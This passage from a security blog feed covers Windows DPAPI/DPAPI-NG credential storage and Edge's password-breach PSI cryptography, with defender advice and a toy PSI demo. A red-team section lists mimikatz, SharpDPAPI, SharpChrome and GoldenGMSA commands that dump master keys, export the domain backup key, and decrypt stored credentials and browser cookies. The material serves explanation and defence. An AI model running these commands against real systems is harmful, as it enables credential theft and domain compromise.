    &quot;Users/alice/AppData/Local/Microsoft/Vault/4BF4C442-9B8A-41A0-B380-DD4A704DDB28/Policy.vpol&quot;: &quot;180B&quot;,
    &quot;Users/alice/AppData/Local/Google/Chrome/User Data/Default/Cookies&quot;: &quot;4MB&quot;,
    &quot;Users/alice/AppData/Local/Google/Chrome/User Data/Local State&quot;: &quot;12KB&quot;,
}&lt;/p&gt;
&lt;p&gt;categories = {
    &quot;Master keys&quot;:          &quot;/Microsoft/Protect/S-1-&quot;,
    &quot;CREDHIST chain&quot;:       &quot;/Protect/CREDHIST&quot;,
    &quot;Credential Manager&quot;:   &quot;/Microsoft/Credentials/&quot;,
    &quot;Windows Vault&quot;:        &quot;/Microsoft/Vault/&quot;,
    &quot;Chrome state key&quot;:     &quot;/Google/Chrome/User Data/Local State&quot;,
    &quot;Chrome cookies&quot;:       &quot;/Google/Chrome/User Data/Default/Cookies&quot;,
}&lt;/p&gt;
&lt;p&gt;report = defaultdict(list)
for path, size in synthetic.items():
    for label, marker in categories.items():
        if marker in path:
            report[label].append((path, size))&lt;/p&gt;
&lt;p&gt;for label, items in report.items():
    print(&quot;==&quot;, label)
    for path, size in items:
        print(&quot;  &quot;, path, &quot;(&quot; + size + &quot;)&quot;)
`}&lt;/p&gt;
&lt;h3&gt;12.3 For a red-team operator&lt;/h3&gt;
&lt;p&gt;The chain of primitives most-commonly used (verbatim from the harmj0y operational guide [@harmj0y-operational-guide] and the Mimikatz wiki [@mimikatz-dpapi-wiki]):&lt;/p&gt;

The operational vocabulary, in order of dependency:&lt;ol&gt;
&lt;li&gt;&lt;code&gt;mimikatz &quot;sekurlsa::dpapi&quot;&lt;/code&gt; -- enumerate cached master keys from a live &lt;code&gt;lsass.exe&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mimikatz &quot;dpapi::masterkey /in:&amp;lt;MK&amp;gt; /sid:&amp;amp;lt;SID&amp;amp;gt; /password:&amp;lt;known&amp;gt;&quot;&lt;/code&gt; -- unwrap a master-key file.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mimikatz &quot;dpapi::cred /in:&amp;lt;credfile&amp;gt;&quot;&lt;/code&gt; -- decrypt a Credential Manager entry.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;mimikatz &quot;lsadump::backupkeys /system:dc.contoso.local /export&quot;&lt;/code&gt; -- export the &lt;a href=&quot;https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-bkrp/&quot; rel=&quot;noopener&quot;&gt;&lt;code&gt;[MS-BKRP]&lt;/code&gt;&lt;/a&gt; RSA private key from a writable DC.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SharpDPAPI triage /pvk:key.pvk&lt;/code&gt; -- offline triage with the domain backup key.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SharpChrome cookies /pvk:key.pvk&lt;/code&gt; -- decrypt Chrome / Edge cookies offline.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;GoldenGMSA gmsainfo&lt;/code&gt; then &lt;code&gt;GoldenGMSA compute -k &amp;lt;root-key-guid&amp;gt; -s &amp;lt;gmsa-sid&amp;gt; -m &amp;lt;managed-password-id&amp;gt;&lt;/code&gt; -- offline gMSA password derivation per the March 2022 disclosure [@semperis-golden-gmsa].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;GoldenDMSA wordlist&lt;/code&gt; / &lt;code&gt;bruteforce&lt;/code&gt; / &lt;code&gt;compute&lt;/code&gt; -- the four-phase Server 2025 dMSA pipeline per the July 2025 disclosure [@semperis-golden-dmsa].&lt;/li&gt;&lt;/ol&gt;

&lt;p&gt;The post-Credential-Guard scope reality: LSASS-isolated NT-hashes are gone (the &lt;em&gt;Credential Guard&lt;/em&gt; article in this series covers what &lt;code&gt;LsaIso.exe&lt;/code&gt; actually computes); on-disk DPAPI master keys, Chrome cookies, and Vault credentials are still there. The credential-vault inventory in §5 is the operator&apos;s map; the §10 disclosure list is the operator&apos;s playbook.&lt;/p&gt;
&lt;h3&gt;12.4 For a platform or identity engineer&lt;/h3&gt;
&lt;p&gt;Provision the KDS root key carefully. Use the &lt;code&gt;Add-KdsRootKey&lt;/code&gt; [@ms-add-kdsrootkey] default 10-day &lt;code&gt;EffectiveTime&lt;/code&gt; for production forests so AD replication converges before any consumer derives against the new key; the &lt;code&gt;-EffectiveTime ((Get-Date).AddHours(-10))&lt;/code&gt; override is for single-DC test forests only, never production.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Golden gMSA defensive answer is detective, not preventive. Configure the &lt;code&gt;msKds-RootKeyData&lt;/code&gt; SACL &lt;em&gt;before&lt;/em&gt; any production gMSA exists, so every read of the root-key attributes generates Security Event 4662 and you have a baseline of &quot;DC accounts only, no humans, ever.&quot; Add the &lt;code&gt;msDS-ManagedPasswordId&lt;/code&gt; cross-trust audit on day 1 too. After-the-fact SACL provisioning leaves a window during which the key may have been read silently.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;For Server 2025 dMSA, monitor the &lt;code&gt;msDS-ManagedPasswordId&lt;/code&gt; [@ms-ms-adts-managedpassword] brute-force surface until Microsoft addresses the time-component predictability the Golden dMSA disclosure [@semperis-golden-dmsa] named.&lt;/p&gt;
&lt;p&gt;For Hello for Business, prefer the TPM-bound KSP (&lt;code&gt;MS_PLATFORM_CRYPTO_PROVIDER&lt;/code&gt;); the software-KSP DPAPI-NG fallback [@ms-whfb-howitworks] is the structural worst case (per §8.3) and inherits the KDS root-key dependency on every TPM-less device.&lt;/p&gt;
&lt;p&gt;Cross-platform context: Apple Keychain [@apple-platform-security-keychain] reaches a stronger upper bound (Secure-Enclave-bound + code-identity-pinned via the Apple Developer Program); GNOME libsecret [@libsecret-reference] covers the analogous Linux primitive over the Secret Service D-Bus interface. Neither is a drop-in replacement; both have shapes worth borrowing if Microsoft ever publishes the Generation-4 design.&lt;/p&gt;
&lt;h3&gt;12.5 The closing reflection&lt;/h3&gt;
&lt;p&gt;The credential vault under everything has a single-sentence summary in 2026: classic DPAPI is as strong as the user&apos;s password; DPAPI-NG is as strong as the KDS root key&apos;s life-cycle SOP is; both architectures admit ceilings the cryptography cannot move. The literacy a practitioner needs is the ability to recognise which ceiling any new incident hits. Twelve sections later, you have it.&lt;/p&gt;
&lt;h2&gt;Frequently Asked Questions&lt;/h2&gt;

No. Credential Guard [@ms-credential-guard] protects LSA-isolated secrets only. Chrome cookies live in the user&apos;s profile under DPAPI / DPAPI-NG and are decryptable by any process running as the user, exactly as before. The Chromium 2024 app-bound encryption [@thn-app-bound] is a per-process workaround for the §9.1 user-context ceiling, not a fix inside DPAPI itself.

A web reset of a *consumer* Microsoft Account password does not append to CREDHIST and does not benefit from [`[MS-BKRP]`](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-bkrp/) backup -- there is no domain in the consumer scenario. Master keys encrypted under the previous password become irrecoverable for consumer Microsoft Accounts, full stop. Domain-joined enterprise users escape this because the domain backup key still works.

True if the KDS root key [@ms-add-kdsrootkey] is intact -- the Semperis write-up [@semperis-golden-gmsa] records the *&quot;randomly generated password of 256 bytes, making it infeasible to crack&quot;* claim. False under the Golden gMSA / Golden dMSA [@semperis-golden-dmsa] assumption that any DA / SYSTEM on a DC can read `msKds-RootKeyData`. A 256-byte random password is irrelevant if the attacker can derive it offline.

No. DPAPI-NG [@ms-cng-dpapi] is a redesign whose protection model is *descriptor-based* (multi-principal, multi-device) rather than *user-and-machine-bound*. The two APIs coexist; classic DPAPI is still the default for `CryptProtectData` [@ms-cryptprotectdata] callers, and DPAPI-NG is the path for `NCryptProtectSecret` [@ms-ncryptprotectsecret] callers.

No. On TPM-less devices the WHfB private key sits in a CNG software-KSP container persisted as a DPAPI-NG blob whose protection descriptor binds it to user SID + device, per the Hello for Business architecture [@ms-whfb-howitworks]. The TPM-bound case is the preferred deployment; the software-KSP fallback is the structural worst case and inherits the §9.3 KDS root-key dependency.

No. `CryptProtectMemory` [@ms-cryptprotectmemory] scrubs in-memory secrets between same-process / cross-process / cross-session lifetimes but cannot prevent the OS from writing the page-protected RAM into `hiberfil.sys` on suspend-to-disk. BitLocker on the system volume is the structural defence (the *BitLocker on Windows* article in this series covers full-volume encryption end-to-end).

No. It broke the *secrecy of DPAPI&apos;s design*. The 2010 disclosure [@usenix-woot10] made the master-key chain public and tractable for offline forensics; it did not weaken the cryptography. The &quot;break&quot; was always structural -- DPAPI is as strong as the user&apos;s password is. The two-author byline is Bursztein and Picod (Black Hat DC 2010, USENIX WOOT 10), not &quot;Bursztein, Picod and Aussel.&quot;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;dpapi-and-dpapi-ng-the-credential-vault-under-everything&quot; keyTerms={[
  { term: &quot;DPAPI&quot;, definition: &quot;The Data Protection API; the per-user / per-machine secret-storage primitive in every Windows release from Windows 2000 onward.&quot; },
  { term: &quot;Master key&quot;, definition: &quot;A 64-byte random secret per user, stored under %APPDATA%/Microsoft/Protect/&amp;lt;SID&amp;gt;/&amp;lt;GUID&amp;gt;, encrypted under a pre-key derived from the user&apos;s password and SID.&quot; },
  { term: &quot;[MS-BKRP] BackupKey Remote Protocol&quot;, definition: &quot;The LSASS-hosted RPC interface that lets a member computer dual-wrap its master key under both the user password pre-key and a DC RSA backup public key; the canonical universal-decryption primitive available to Domain Admins.&quot; },
  { term: &quot;CREDHIST&quot;, definition: &quot;The previous-password hash chain stored in %APPDATA%/Microsoft/Protect/CREDHIST; one entry per self-initiated password change; broken by administrative reset and consumer-Microsoft-Account web reset.&quot; },
  { term: &quot;Protection descriptor (DPAPI-NG)&quot;, definition: &quot;The DPAPI-NG self-describing string (SID, SDDL, LOCAL, WEBCREDENTIALS, CERTIFICATE) that names the set of principals permitted to remove protection from a blob.&quot; },
  { term: &quot;Microsoft Key Distribution Service (kdssvc.dll)&quot;, definition: &quot;The DC-side daemon that implements the [MS-GKDI] protocol and computes per-(group, period) keys deterministically from a single forest-wide root key.&quot; },
  { term: &quot;KDS root key&quot;, definition: &quot;The single forest-wide secret that anchors every per-(group, period) key the KDS will ever derive; provisioned exactly once per forest with Add-KdsRootKey; documented as having no rotation procedure.&quot; },
  { term: &quot;Group Managed Service Account (gMSA)&quot;, definition: &quot;A Server-2012-introduced AD account whose 256-byte password is derived from the KDS chain and rotated every 30 days, gated by the msDS-GroupMSAMembership SDDL.&quot; },
  { term: &quot;Software KSP&quot;, definition: &quot;The non-hardware-bound CNG Key Storage Provider that persists key material as DPAPI-NG-protected files; used as the WHfB fallback on TPM-less devices.&quot; },
  { term: &quot;Golden gMSA / Golden dMSA&quot;, definition: &quot;The 2022 / 2025 Semperis offline-derivation attacks that compute any gMSA / dMSA password the forest will ever issue, given a one-shot read of the four KDS root-key attributes.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-security</category><category>dpapi</category><category>dpapi-ng</category><category>kds</category><category>gmsa</category><category>credential-guard</category><category>mimikatz</category><category>golden-gmsa</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Edge&apos;s Two Password Cryptographies: A Beautiful PSI on the Wire, and Plaintext RAM by Design</title><link>https://paragmali.com/blog/edge-two-password-cryptographies/</link><guid isPermaLink="true">https://paragmali.com/blog/edge-two-password-cryptographies/</guid><description>Microsoft Edge ships a homomorphic-encryption PSI for breach checking and decrypts every saved password into process RAM at launch. Both designs are deliberate. They defend different threat models.</description><pubDate>Mon, 11 May 2026 00:00:00 GMT</pubDate><content:encoded>
Microsoft Edge ships two cryptographic designs for &quot;passwords&quot; inside the same `msedge.exe` binary, owned by the same product team, with radically different threat models. The first -- Password Monitor -- is a deployed Private Set Intersection protocol built on Microsoft SEAL, the first production consumer homomorphic-encryption deployment in a browser, and is state-of-the-art cryptography for defending against a compromised breach-corpus server. The second -- Edge&apos;s local credential storage -- decrypts every saved password into process memory at browser launch and keeps it there for the lifetime of the session, a design Tom Joran Sonstebyseter Ronning&apos;s `EdgeSavedPasswordsDumper` (May 4, 2026) made legible and that Microsoft classified as &quot;by design.&quot; These are not incompatible designs. They are precise statements about which threat models the Edge product team is and is not defending against, and treating them as one unified &quot;password security&quot; story masks where the actual compromise happens in 2026.
&lt;h2&gt;1. Two cryptographies, one product, one week&lt;/h2&gt;
&lt;p&gt;On &lt;strong&gt;January 21, 2021&lt;/strong&gt;, Microsoft Research&apos;s Cryptography and Privacy group announced Edge&apos;s Password Monitor ships a homomorphic-encryption-based Private Set Intersection protocol built on Microsoft SEAL. The post is explicit that this is &quot;possible due to pioneering cryptography research and technology incubation done here at Microsoft Research,&quot; that it is the result of a collaboration &quot;between [the] Cryptography and Privacy Research Group, and Edge product team,&quot; and that the protocol descends from two specific papers: &quot;Fast Private Set Intersection from Homomorphic Encryption&quot; and &quot;Labeled PSI from Fully Homomorphic Encryption with Malicious Security&quot; [@msr-password-monitor-2021]. It is, by a comfortable margin, the first production consumer deployment of homomorphic encryption in a browser.&lt;/p&gt;
&lt;p&gt;On &lt;strong&gt;May 4, 2026, at 14:29:51 UTC&lt;/strong&gt;, a researcher in Oslo named Tom Joran Sonstebyseter Ronning posted to X: &quot;Microsoft Edge loads all your saved passwords into memory in cleartext -- even when you&apos;re not using them&quot; [@ronning-x]. He linked a GitHub repository called &lt;code&gt;EdgeSavedPasswordsDumper&lt;/code&gt;: roughly 230 lines of C# that opens a handle to the parent &lt;code&gt;msedge.exe&lt;/code&gt; process and reads every saved credential as plaintext, with no kernel exploit, no admin (against same-user processes), and no &lt;a href=&quot;https://paragmali.com/blog/dpapi-and-dpapi-ng-the-credential-vault-under-everything/&quot; rel=&quot;noopener&quot;&gt;DPAPI&lt;/a&gt; bypass [@ronning-github]. The README confirms the behaviour is present in &quot;any Edge versions that&apos;s Chromium based (from version 79 and newer, including 147.0.3912.98 and any future version)&quot; [@ronning-github]. Two days later, on &lt;strong&gt;May 6, 2026&lt;/strong&gt;, Microsoft told Forbes that the in-memory behaviour is &quot;an expected feature of the application&quot; and &quot;by design&quot; [@forbes-winder].&lt;/p&gt;
&lt;p&gt;Both designs ship in the same binary. Both are owned by the same product team. Both can be defended on technical grounds. And both stories get told about the same word: &quot;passwords.&quot;&lt;/p&gt;
&lt;p&gt;This article argues they are about two different threat models, and the apparent contradiction in the headline disappears once you separate them.&lt;/p&gt;

A two-party cryptographic protocol in which Alice holds a set $S_A$, Bob holds a set $S_B$, and they jointly compute $S_A \cap S_B$ such that each party learns the intersection (or, in some variants, only one party does) and nothing else about the other party&apos;s set beyond what the intersection implies.
&lt;p&gt;The PSI story is genuinely beautiful. It begins in 1986 with a paper hardly anyone reads, climbs through a 35-year cryptographic engineering effort to make oblivious transfer cheap enough to be free, lands in 2017 on a homomorphic-encryption breakthrough whose cost curve fits the breach-checking problem exactly, and ships on consumers&apos; desktops by 2021 [@msr-password-monitor-2021]. The endpoint-storage story is genuinely awkward. Edge unwraps every DPAPI-encrypted saved credential into process memory when the password feature first activates, keeps the plaintext resident for the lifetime of the session, and accepts that any same-user process can read it back out [@ronning-github]. Microsoft&apos;s official position is that local code execution on the user&apos;s machine is &quot;outside the threat model&quot; of the browser password store -- a position that is internally consistent with a decade of MSRC policy and also true [@forbes-winder].&lt;/p&gt;
&lt;p&gt;The thesis: &lt;strong&gt;&quot;password security&quot; is at least two threat models&lt;/strong&gt;, and Microsoft has chosen to deploy genuinely state-of-the-art cryptography against one of them while explicitly conceding the other. Treating both as one unified story is how product narratives obscure where the actual compromise happens in 2026.&lt;/p&gt;

timeline
    title PSI and browser credential storage, 1986 to 2026
    1986 : Meadows PSI
         : NRL matchmaking
    1999 : Huberman-Franklin-Hogg
         : DH meet-in-the-middle
    2003 : IKNP03 OT extension
    2004 : FNP04 polynomial PSI
    2015 : KOS15 active security
    2016 : KKRT16 OPRF-PSI
    2017 : CLR17 HE-PSI
         : Signal SGX contact discovery
    2018 : CHLR18 Labeled PSI
         : HIBP v2 k-anonymity
    2019 : Google Password Checkup
         : Silent OT
    2021 : Edge Password Monitor ships
         : Cong et al. CCS 2021
    2024 : Chrome App-Bound Encryption
    2026 : Ronning EdgeSavedPasswordsDumper
         : Microsoft &quot;by design&quot;
&lt;p&gt;To see why the two designs are not a contradiction, we need to understand how PSI got to be deployable at all -- a story that begins thirty-five years before Edge Password Monitor existed.&lt;/p&gt;
&lt;h2&gt;2. Why Private Set Intersection exists at all&lt;/h2&gt;
&lt;p&gt;Imagine two parties, neither of whom trusts the other. Alice has a set of identifiers; Bob has a set of identifiers. They want to learn which identifiers they share -- and only that. Each party wants to learn nothing about elements not in the intersection.&lt;/p&gt;
&lt;p&gt;This is not an obvious problem to need a protocol for. If Alice and Bob trusted a third party, they would hand over their sets. If they trusted each other, they would compare directly. The problem only becomes interesting when neither assumption holds. The 2026 canonical version looks like this: &lt;em&gt;Microsoft holds a curated set of roughly five billion breached credentials, and the user holds a few hundred passwords saved in their browser. The user wants to know which of their passwords appear in Microsoft&apos;s breach corpus -- and they want Microsoft to learn nothing about the passwords that do not.&lt;/em&gt; (Throughout this article the &quot;five billion&quot; figure is the author&apos;s 2026 forward projection of Microsoft&apos;s compromised-credential corpus; the contemporaneous Microsoft Research figure used in the 2021 Password Monitor announcement is four billion [@msr-password-monitor-2021], and the §3 sidenote spells out the inference.)&lt;/p&gt;
&lt;p&gt;That framing did not exist in 1986. The original motivation was much weirder.&lt;/p&gt;
&lt;h3&gt;The 1986 paper&lt;/h3&gt;
&lt;p&gt;Catherine Meadows, then at the U.S. Naval Research Laboratory, published &quot;A More Efficient Cryptographic Matchmaking Protocol for Use in the Absence of a Continuously Available Third Party&quot; at the 1986 IEEE Symposium on Security and Privacy [@meadows-1986][@ieee-6234864]. The titular &quot;matchmaking&quot; problem was prosaic. Two parties want to learn whether they share an interest in some sensitive list -- classified-mailing-list membership, intelligence-source overlap, the everyday work of compartmented information systems -- without revealing anything else.&lt;/p&gt;
&lt;p&gt;Meadows&apos;s protocol uses commutative encryption. Alice and Bob both raise the elements of their sets to private exponents over a Diffie-Hellman group. After two rounds, both parties hold the doubly-blinded versions of both sets. Equal underlying elements produce equal doubly-blinded values, because exponentiation in an Abelian group commutes. Unequal elements look like uniform-random group elements to both sides. The intersection comes out; the rest does not.&lt;/p&gt;
&lt;p&gt;Meadows wrote this ten years before Diffie-Hellman key exchange shipped in SSL 3.0 (November 1996), the protocol family TLS would standardise in 1999 [@wikipedia-tls], and thirty-five years before her protocol&apos;s intellectual descendants would ship in a consumer browser.&lt;/p&gt;
&lt;h3&gt;The 1999 revival&lt;/h3&gt;
&lt;p&gt;The same protocol shape was rediscovered and given its modern formulation by Bernardo Huberman, Matthew Franklin, and Tad Hogg at Xerox PARC in 1999. Their paper &quot;Enhancing Privacy and Trust in Electronic Communities&quot; was published at the First ACM Conference on Electronic Commerce [@hfh-1999]. The motivations were online-community problems that look quaint today: which of your friends are on this matchmaking site, do we share interests on a sensitive bulletin board, can two early-internet communities establish trust without leaking their member lists. The protocol they wrote down -- usually called &quot;DH meet-in-the-middle&quot; or just &quot;the Huberman-Franklin-Hogg protocol&quot; -- is the canonical PSI shape every security engineer still reaches for first.The dblp BibTeX record gives the canonical DOI as 10.1145/336992.337012, which the ACM Digital Library 403s to most non-browser User-Agents. The dblp HTML mirror returns 200 and confirms the citation [@dblp-hfh].&lt;/p&gt;
&lt;h3&gt;What had to exist before&lt;/h3&gt;
&lt;p&gt;PSI predates breach checking by twenty years. The cryptographers who built PSI did not know they were building Edge Password Monitor. They were building a protocol primitive that happened, much later, to map cleanly onto a problem the world did not yet have.&lt;/p&gt;
&lt;p&gt;The first such mapping landed in 2018 with HIBP&apos;s k-anonymity API and the cluster of academic and industry PSI deployments that followed [@hunt-pwned-v2-2018]. The primitive predated the killer application by two and a half decades. This is the normal shape of cryptographic engineering: the primitive sits on the shelf until the world needs it.&lt;/p&gt;
&lt;p&gt;The DH meet-in-the-middle protocol is elegant. It is also catastrophically wrong for the breach-checking use case. To see why, we have to count exponentiations.&lt;/p&gt;
&lt;h2&gt;3. Early approaches: DH meet-in-the-middle and FNP04&lt;/h2&gt;
&lt;p&gt;Let us walk the DH meet-in-the-middle protocol step by step. Alice holds a set $S_A$. Bob holds a set $S_B$. Both parties agree on a Diffie-Hellman group $G$ of prime order $q$ with generator $g$, and on a cryptographic hash function $H: {0,1}^* \to G$ that maps set elements into the group. Alice picks a private exponent $a \in \mathbb{Z}_q$; Bob picks $b$.&lt;/p&gt;
&lt;p&gt;The protocol proceeds in two rounds:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Alice computes ${H(x)^a : x \in S_A}$, shuffles, and sends to Bob.&lt;/li&gt;
&lt;li&gt;Bob computes ${H(y)^b : y \in S_B}$, shuffles, and sends to Alice.&lt;/li&gt;
&lt;li&gt;Alice exponentiates every value Bob sent her by $a$, producing ${H(y)^{ab} : y \in S_B}$. She sends this set back to Bob &lt;em&gt;in the order Bob originally sent his&lt;/em&gt; ${H(y)^b}$, so Bob can index by his own set.&lt;/li&gt;
&lt;li&gt;Bob exponentiates Alice&apos;s first-round values by $b$, producing ${H(x)^{ab} : x \in S_A}$. (In the symmetric variant Bob also sends his doubly-blinded set back to Alice; either side can then perform the match.)&lt;/li&gt;
&lt;li&gt;Both parties now hold the same doubly-blinded set for both sides. Equal underlying elements collide; unequal ones do not. They intersect locally.&lt;/li&gt;
&lt;/ol&gt;

sequenceDiagram
    participant A as Alice (set S_A)
    participant B as Bob (set S_B)
    Note over A,B: shared group G, hash H, private exponents a (Alice), b (Bob)
    A-&amp;gt;&amp;gt;B: shuffled set of H(x)^a for x in S_A
    B-&amp;gt;&amp;gt;A: shuffled set of H(y)^b for y in S_B
    A-&amp;gt;&amp;gt;A: compute H(y)^(ba) for each item from Bob
    B-&amp;gt;&amp;gt;B: compute H(x)^(ab) for each item from Alice
    Note over A,B: equal underlying elements yield equal doubly-blinded values
    A-&amp;gt;&amp;gt;B: ordered set of H(y)^(ab) for matching
    Note over A,B: intersection computed locally
&lt;p&gt;Why this is right. Under the Decisional Diffie-Hellman (DDH) assumption in $G$, the doubly-blinded values $H(x)^{ab}$ for $x \notin S_A \cap S_B$ look uniformly random to the other side. Equal underlying elements collide; unequal underlying elements do not. The reader can verify this for themselves in the demonstration below, which is the canonical pedagogical version of the protocol.&lt;/p&gt;
&lt;p&gt;{&lt;code&gt;// Toy PSI -- pedagogical only, NOT secure (small modulus, weak hash). const p = 2n ** 61n - 1n;      // Mersenne prime, small for demo const g = 37n;                  // generator over Z_p* (toy) const H = s =&amp;gt; {   // toy hash: deterministic map string -&amp;gt; [1, p-1]   let h = 1469598103934665603n;   for (const c of s) h = ((h ^ BigInt(c.charCodeAt(0))) * 1099511628211n) % p;   return h === 0n ? 1n : h; }; const expMod = (base, exp, mod) =&amp;gt; {   let r = 1n, b = base % mod, e = exp;   while (e &amp;gt; 0n) {     if (e &amp;amp; 1n) r = (r * b) % mod;     b = (b * b) % mod;     e &amp;gt;&amp;gt;= 1n;   }   return r; }; const S_A = [&quot;alice-at-example.com&quot;, &quot;bob-at-example.com&quot;, &quot;carol-at-example.com&quot;]; const S_B = [&quot;dave-at-example.com&quot;, &quot;bob-at-example.com&quot;, &quot;carol-at-example.com&quot;]; const a = 0xC0FFEEn, b = 0xBADCAFEn; const A1 = S_A.map(x =&amp;gt; expMod(H(x), a, p));   // Alice -&amp;gt; Bob const B1 = S_B.map(y =&amp;gt; expMod(H(y), b, p));   // Bob -&amp;gt; Alice const A2 = A1.map(v =&amp;gt; expMod(v, b, p));       // Bob blinds Alice&apos;s set const B2 = B1.map(v =&amp;gt; expMod(v, a, p));       // Alice blinds Bob&apos;s set // Reveal intersection by matching doubly-blinded values const setA2 = new Set(A2.map(String)); const intersection = S_B.filter((_, i) =&amp;gt; setA2.has(String(B2[i]))); console.log(&quot;Intersection:&quot;, intersection);&lt;/code&gt;}&lt;/p&gt;
&lt;p&gt;The protocol does work. It gives semi-honest security under DDH and costs $O(|S_A| + |S_B|)$ group exponentiations per side, plus the same again to blind the received set. In a balanced setting -- two sets of similar size, perhaps a few thousand elements each -- it is genuinely deployable.&lt;/p&gt;
&lt;h3&gt;The three things that go wrong at scale&lt;/h3&gt;
&lt;p&gt;For breach checking, the protocol breaks in three documented ways.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Set-cardinality leakage.&lt;/strong&gt; The shuffled lists Alice and Bob send each other have lengths $|S_A|$ and $|S_B|$. Bob learns precisely how many passwords Alice has saved; Alice learns precisely how big Bob&apos;s breach corpus is. The first leak is small but real; the second is fine when the server publishes its corpus size anyway (HIBP does), but the protocol does not hide it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Online-cost asymmetry.&lt;/strong&gt; The server pays $O(|S_B|)$ exponentiations per client query. At the five-billion-element scale of Microsoft&apos;s compromised-credential corpus, no realistic group exponentiation cost makes this feasible per query: even at 100 microseconds per exponentiation (optimistic for $|q| = 256$), five billion exponentiations is more than five days of single-core CPU. Sharding helps. Caching helps. Pre-computation helps. None makes the asymptotic curve workable as the corpus grows.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;No labeled variant.&lt;/strong&gt; The protocol returns set membership, not associated metadata. Edge Password Monitor wants to tell you &quot;this credential appeared in breach X&quot; -- so the protocol has to support associating a server-side label with each set element and returning the label for matched elements. DH meet-in-the-middle does not, without unpleasant extensions.&lt;/p&gt;
&lt;h3&gt;FNP04: the right idea, wrong substrate&lt;/h3&gt;
&lt;p&gt;The algebraic alternative arrived in 2004 with Freedman, Nissim, and Pinkas&apos;s &quot;Efficient Private Matching and Set Intersection&quot; at EUROCRYPT [@fnp-2004]. The idea is gorgeous. Alice encodes her set $S_A = {x_1, \dots, x_n}$ as the polynomial whose roots are her set:&lt;/p&gt;
&lt;p&gt;$$p(z) = \prod_{i=1}^{n} (z - x_i)$$&lt;/p&gt;
&lt;p&gt;Alice encrypts each coefficient of $p$ under an additively-homomorphic encryption scheme (Paillier, in the paper). She sends the encrypted coefficients to Bob. Bob homomorphically evaluates $p(y)$ for every element $y$ of his set $S_B$ and returns the encrypted results. If $y \in S_A$, then $p(y) = 0$, and after decryption Alice sees a zero in the corresponding position. If $y \notin S_A$, then $p(y)$ is a non-trivial polynomial evaluation that, randomized correctly, decrypts to a uniform value Alice cannot interpret.&lt;/p&gt;
&lt;p&gt;This is the first asymmetric PSI -- the first protocol where one party can do most of the work while the other sends only a small encrypted query. It is also, in deployment terms, structurally infeasible at scale. Paillier ciphertexts live in $\mathbb{Z}^*_{n^2}$ and are $2 \cdot |n|$ bits each [@paillier-1999] (2048 bits for FNP04&apos;s $|n| = 1024$ default; 4096 bits for the $|n| \geq 2048$ that modern security demands). Paillier homomorphic evaluation needs full-size modular exponentiation per coefficient, and the server compute scales as $O(|S_A| \cdot |S_B|)$. At Edge Password Monitor&apos;s target scale -- a client set of a few hundred passwords against a five-billion-element server corpus -- a single query would take minutes to hours of server compute and tens of megabytes of round-trip data per query.The 5-billion-element estimate is INFERRED, not measured (see §2 for the article-wide projection disclosure). No published source benchmarks FNP04 at that scale; the inference combines the $O(|S_A| \cdot |S_B|)$ asymptotic with measured Paillier throughput on commodity hardware. The order-of-magnitude conclusion is sound; treat the precise number as a back-of-envelope.The polynomial-roots idea is not dead. Thirteen years later, Chen, Laine, and Rindal will revive exactly this construction inside CLR17 [@clr-2017], with Paillier replaced by BFV-style somewhat-homomorphic encryption and a partition-and-evaluate trick that fixes the $O(|S_A| \cdot |S_B|)$ blow-up. The structure survives; the substrate gets swapped.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Protocol&lt;/th&gt;
&lt;th&gt;Era&lt;/th&gt;
&lt;th&gt;Server cost&lt;/th&gt;
&lt;th&gt;Communication&lt;/th&gt;
&lt;th&gt;Verdict at 5B-element scale&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;DH meet-in-the-middle [@hfh-1999]&lt;/td&gt;
&lt;td&gt;1999&lt;/td&gt;
&lt;td&gt;$O(&lt;/td&gt;
&lt;td&gt;S_B&lt;/td&gt;
&lt;td&gt;)$ DH exponentiations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;FNP04 [@fnp-2004]&lt;/td&gt;
&lt;td&gt;2004&lt;/td&gt;
&lt;td&gt;$O(&lt;/td&gt;
&lt;td&gt;S_A&lt;/td&gt;
&lt;td&gt;\cdot&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;(preview) HE-PSI on BFV [@clr-2017]&lt;/td&gt;
&lt;td&gt;2017&lt;/td&gt;
&lt;td&gt;$O(&lt;/td&gt;
&lt;td&gt;S_B&lt;/td&gt;
&lt;td&gt;\log&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The naive approach -- &quot;just hash and compare&quot; -- leaks set cardinality at a minimum, and plain hashing is brute-forceable against any password the server can guess. Doing PSI properly under encryption requires either $O(|S_A| \cdot |S_B|)$ server work and 2048-bit Paillier ciphertexts (FNP04, dead at billions), or a new primitive: oblivious transfer at scale. It takes a decade of engineering to make that primitive free.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;FNP04&apos;s polynomial idea will turn out to be the right idea -- but only after we replace Paillier with somewhat-homomorphic encryption thirteen years later. Before we can get there, we need a different breakthrough: making the underlying oblivious-transfer primitive cheap enough that &lt;em&gt;every&lt;/em&gt; PSI in the literature can ride on it.&lt;/p&gt;
&lt;h2&gt;4. The evolution: oblivious transfer extension&lt;/h2&gt;
